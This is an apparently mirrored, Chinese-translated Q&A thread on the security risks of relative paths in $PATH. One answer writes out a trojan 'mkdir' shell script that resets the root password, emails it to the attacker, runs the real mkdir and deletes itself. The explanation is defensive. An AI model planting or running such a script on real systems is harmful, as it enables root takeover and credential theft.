AskOverflow.Dev

AskOverflow.Dev Logo AskOverflow.Dev Logo

AskOverflow.Dev Navigation

  • 主页
  • 系统&网络
  • Ubuntu
  • Unix
  • DBA
  • Computer
  • Coding
  • LangChain

Mobile menu

Close
  • 主页
  • 系统&网络
    • 最新
    • 热门
    • 标签
  • Ubuntu
    • 最新
    • 热门
    • 标签
  • Unix
    • 最新
    • 标签
  • DBA
    • 最新
    • 标签
  • Computer
    • 最新
    • 标签
  • Coding
    • 最新
    • 标签
主页 / server / 问题 / 776187
Accepted
ehime
ehime
Asked: 2016-05-12 09:21:28 +0800 CST2016-05-12 09:21:28 +0800 CST 2016-05-12 09:21:28 +0800 CST

在 PATH 环境变量中使用相对路径的安全隐患?

  • 772

我们有一个审计只是标记我们在$PATHenv 变量中具有相对路径。我不确定这是否真的是一个安全问题,并且想与每个人联系,看看这是否真的是一个安全问题,或者它是否只是我认为的最佳实践。有人可以提供有关$PATH与亲戚一起使用的任何安全问题的信息吗?谢谢

linux security environment-variables
  • 2 2 个回答
  • 3555 Views

2 个回答

  • Voted
  1. Matthew Ife
    2016-05-12T10:49:36+08:002016-05-12T10:49:36+08:00

    您使用的路径有两个问题。

    1. 路径是相对的。
    2. 相对路径位于主路径之前。

    假设您有以下 shell 脚本,您以 root 身份使用来更新某些 Web 应用程序,并且您已经设置了$PATH正在使用的/etc/profile

    #!/bin/bash
    pushd /dev/shm
    git clone http://some/git/path/web_app
    cp -a web_app /var/www/html
    rm -fr web_app
    popd
    

    对于攻击者,您提供了一种在由所述攻击者控制的 shell 中执行某些内容的方法。一种攻击形式看起来像这样——我试图mkdir在易受攻击的脚本中破坏对调用的控制。

    attacker$ cd /dev/shm
    attacker$ mkdir -p apps/java/bin
    attacker$ vi apps/java/bin/mkdir
    #!/bin/bash
    echo "some_random_password" | passwd --stdin root
    echo "We owned that guy with some_random_password" | mail -s "Pwned" [email protected]
    /bin/mkdir $@
    rm -fr /dev/shm/apps
    attacker$ chmod +x apps/java/bin/mkdir
    

    然后我等你更新你的webapp。

    现在会发生什么,易受攻击的脚本切换到/dev/shm. 当它执行此操作并运行mkdir时,它首先找到apps/java/bin/mkdir程序,在这种情况下,该程序会重置 root 密码,将新的 root 密码通过电子邮件发送给攻击者,实际上调用 real mkdir(隐藏任何实际发生的事实)并将自己从攻击中移除小路。

    以root 身份,您不知道发生了什么,并且一旦交付了有效负载,证据就会被删除。

    • 9
  2. Best Answer
    Law29
    2016-05-12T10:22:24+08:002016-05-12T10:22:24+08:00

    在 $PATH 中使用相对路径的问题在于,如果攻击者可以在您的文件系统中创建一个具有给定名称的文件,那么您就有执行该文件的风险。

    示例:df或者监控说 /var 已满,du说 it's /var/spool/ftp/uploads,你怎么办?

    cd /var/spool/ftp/uploads
    ls -ltr
    

    你是拥有的。你甚至没有ls在输出中看到,所以你永远不会知道。

    将 ftp 上传替换为某些客户端网站的某些数据目录,或共享机器的 /tmp 目录,或许多其他东西。

    诚然,这不会经常发生,但风险是存在的,而且写作./script很script容易。

    • 4

相关问题

  • 在 SOHO 环境中实施的最佳 VPN 技术是什么?[关闭]

  • 更改 PHP 的默认配置设置?

  • 保护新的 Ubuntu 服务器 [关闭]

  • (软)Ubuntu 7.10 上的 RAID 6,我应该迁移到 8.10 吗?

Sidebar

Stats

  • 问题 205573
  • 回答 270741
  • 最佳答案 135370
  • 用户 68524
  • 热门
  • 回答
  • Marko Smith

    新安装后 postgres 的默认超级用户用户名/密码是什么?

    • 5 个回答
  • Marko Smith

    SFTP 使用什么端口?

    • 6 个回答
  • Marko Smith

    命令行列出 Windows Active Directory 组中的用户?

    • 9 个回答
  • Marko Smith

    什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同?

    • 3 个回答
  • Marko Smith

    如何确定bash变量是否为空?

    • 15 个回答
  • Martin Hope
    Tom Feiner 如何按大小对 du -h 输出进行排序 2009-02-26 05:42:42 +0800 CST
  • Martin Hope
    Noah Goodrich 什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同? 2009-05-19 18:24:42 +0800 CST
  • Martin Hope
    Brent 如何确定bash变量是否为空? 2009-05-13 09:54:48 +0800 CST
  • Martin Hope
    cletus 您如何找到在 Windows 中打开文件的进程? 2009-05-01 16:47:16 +0800 CST

热门标签

linux nginx windows networking ubuntu domain-name-system amazon-web-services active-directory apache-2.4 ssh

Explore

  • 主页
  • 问题
    • 最新
    • 热门
  • 标签
  • 帮助

Footer

AskOverflow.Dev

关于我们

  • 关于我们
  • 联系我们

Legal Stuff

  • Privacy Policy

Language

  • Pt
  • Server
  • Unix

© 2023 AskOverflow.DEV All Rights Reserve